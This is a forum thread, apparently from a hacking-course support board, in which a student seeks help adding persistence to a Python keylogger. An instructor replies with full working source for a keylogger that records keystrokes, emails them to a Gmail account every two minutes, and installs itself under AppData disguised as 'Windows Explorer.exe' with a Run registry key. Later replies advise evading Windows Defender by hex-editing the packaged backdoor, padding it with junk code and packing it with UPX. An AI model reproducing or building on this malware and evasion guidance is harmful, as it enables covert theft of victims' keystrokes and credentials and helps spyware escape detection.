- This topic has 7 replies, 2 voices, and was last updated 5 years, 1 month ago by AJ.
- AuthorPosts
- October 17, 2019 at 3:18 pm #26068alisonsmith494Participant
Hello Zaid,
I follow the Keylogger and backdoor cause, you did not cover how to include Persistence in keylogger, i tried to do it by my self, which i follow the code you used in the backdoor and i got the following error below
root@kali:~/PycharmProjects/keylogger# python zlogger.py
Traceback (most recent call last):
File “zlogger.py”, line 4, in <module>
my_keylogger = keylogger.Keylogger(120, “[email protected]”, “alexnuga2”)
File “/root/PycharmProjects/keylogger/keylogger.py”, line 10, in __init__
self.become_persistent()
File “/root/PycharmProjects/keylogger/keylogger.py”, line 17, in become_persistent
evil_file_location = os.environ[“appdata”] + “\\Windows Explorer.exe”
NameError: global name ‘os’ is not definedPlease put the thought with a shot video how to fix the Persistence in keylogger
October 19, 2019 at 1:35 pm #26133AJParticipantHi Alison,
Sorry for the late reply. Can you show me the source code of the zlogger.py, so we can better debug the issue please?
Thank you.October 19, 2019 at 2:08 pm #26139alisonsmith494ParticipantHello AJ,
Below is the source code of the kelogger and and zlogger,Keylogger:
#!/usr/bin/env python
import pynput.keyboard
import threading
import smtplibclass Keylogger:
def __init__(self, time_interval, email, password):
self.log = “Keylogger started”
self.interval = time_interval
self.email = email
self.password = passworddef append_to_log(self, string):
self.log = self.log + stringdef process_key_press(self, key):
try:
current_key = str(key.char)
except AttributeError:
if key == key.space:
current_key = ” ”
else:
current_key = ” ” + str(key) + ” ”
self.append_to_log(current_key)def report(self):
self.send_mail(self.email, self.password, “\n\n” + self.log)
self.log = “”
timer = threading.Timer(self.interval, self.report)
timer.start()def send_mail(self, email, password, message):
server = smtplib.SMTP(“smtp.gmail.com”, 587)
server.starttls()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()def start(self):
keyboard_listener =pynput.keyboard.Listener(on_press=self.process_key_press)
with keyboard_listener:
self.report()
keyboard_listener.join()================
Zlogger#!/usr/bin/env python
import keyloggermy_keylogger = keylogger.Keylogger(120, “[email protected]”, “alexnuga2”)
my_keylogger.start()========================================
And i tried to use this code below to make the zlogger persistent in Window, but i keep on having errorimport shutill
import sysself.become_persistent()
def become_persistent(self):
location = os.environ[“appdata”] + “\\windowsupdate.exe”
if not os.path.exists(location):
shutil.copyfile(sys.executable, location)
subprocess.call(‘reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d “‘ + location + ‘”‘, shell=True)I will looking forward to hear from you with solution.
Regards.
October 22, 2019 at 8:53 pm #26237AJParticipantHi Alison,
I am sorry for the late reply. I actually managed to reproduce the same keylogger with persistence and it worked. Please check the following source code, and try to use it for later debugging or if you want to buildup on this:
klog_object.py
#!/usr/bin/env python import persistent_keylogger my_keylogger = persistent_keylogger.Keylogger(120, “[email protected]”, “alexnuga2”) my_keylogger.start()
Actual code of persistence_keylogger.py
#!/usr/bin/env python import pynput.keyboard import threading import smtplib import shutil import os import sys import subprocess class Keylogger: def __init__(self, time_interval, email, password): self.log = "Keylogger started" self.become_persistent() self.interval = time_interval self.email = email self.password = password def become_persistent(self): evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe" if not os.path.exists(evil_file_location): shutil.copyfile(sys.executable, evil_file_location) subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True) def append_to_log(self, string): self.log = self.log + string def process_key_press(self, key): try: current_key = str(key.char) except AttributeError: if key == key.space: current_key = " " else: current_key = " " + str(key) + " " self.append_to_log(current_key) def report(self): self.send_mail(self.email, self.password, "\n\n" + self.log) self.log = "" timer = threading.Timer(self.interval, self.report) timer.start() def send_mail(self, email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) server.sendmail(email, email, message) server.quit() def start(self): keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press) with keyboard_listener: self.report() keyboard_listener.join()
Note: Please note that I’ve changed the names of the file and tested the keylogger with my Gmail even after the target system has been restarted, but I put your name again for convenience, and that you put the correct file names for I changed them when I edited the above source code.
Please let me know how it goes. Thank you.
October 23, 2019 at 12:31 pm #26257alisonsmith494ParticipantHi AJ,
Thanks for your reply, the most important challenge now is how to bypass Windows Defender, My Klogger and Payload never get exexuted on window, Please i need help on how to bypass Windows Defender, i have tried all your evision but still get detected, Is there any crypter or way to bypass Defender…
Thanks
October 24, 2019 at 1:22 am #26289AJParticipantHi Alison,
Please give some time, and I’ll get back to you asap. BTW, did the persistent feature worked for you?
October 28, 2019 at 2:10 pm #26404alisonsmith494ParticipantHi AJ,
Thanks for the response, yes the feature works, but the window 10 defender never allow me to try it, if there is a dropper to crypter to bypass defender i would appreciate it …
Regards.
October 29, 2019 at 8:54 pm #26437AJParticipantHi Alison,
You have several options to bypass Windows defender, so you can:
1. Modify the backdoor executable after packaging using a hex editor, so you can use
hexeditor <filename>
that comes pre-installed in Kali, and try to modify some part of it, but please make sure that you don’t break the payload. Now Zaid does cover how to do this in the “Social Engineering” course, though you can check for more examples online to buildup on this as shown below:
https://null-byte.wonderhowto.com/how-to/hack-your-game-saves-basic-guide-hex-editing-0132155/
https://hackingandsecurity.blogspot.com/2016/03/fud-through-hex-editor-heading.html2. Add some random data like various printing functions, statements, and by including new variable names to make the backdoor looks more unique, thus increasing the chance of generating a unique signature that can bypass Windows Defender signatures DB. Now, this seems daunting, but this process is a trial and error process, so you have to try to edit the code without breaking it after you package the backdoor python source code of the “klog_object.py”. You can also install upx to enhance the backdoor exe when you test it on nodistribute.com from
https://github.com/upx/upx/releases/Now, this is covered in section 15, in which you will learn how to bypass a reasonable number of AV if you follow the same procedure and the above notes and resources.
Please let me know if you face any issues again. Thank you.
- AuthorPosts
- You must be logged in to reply to this topic.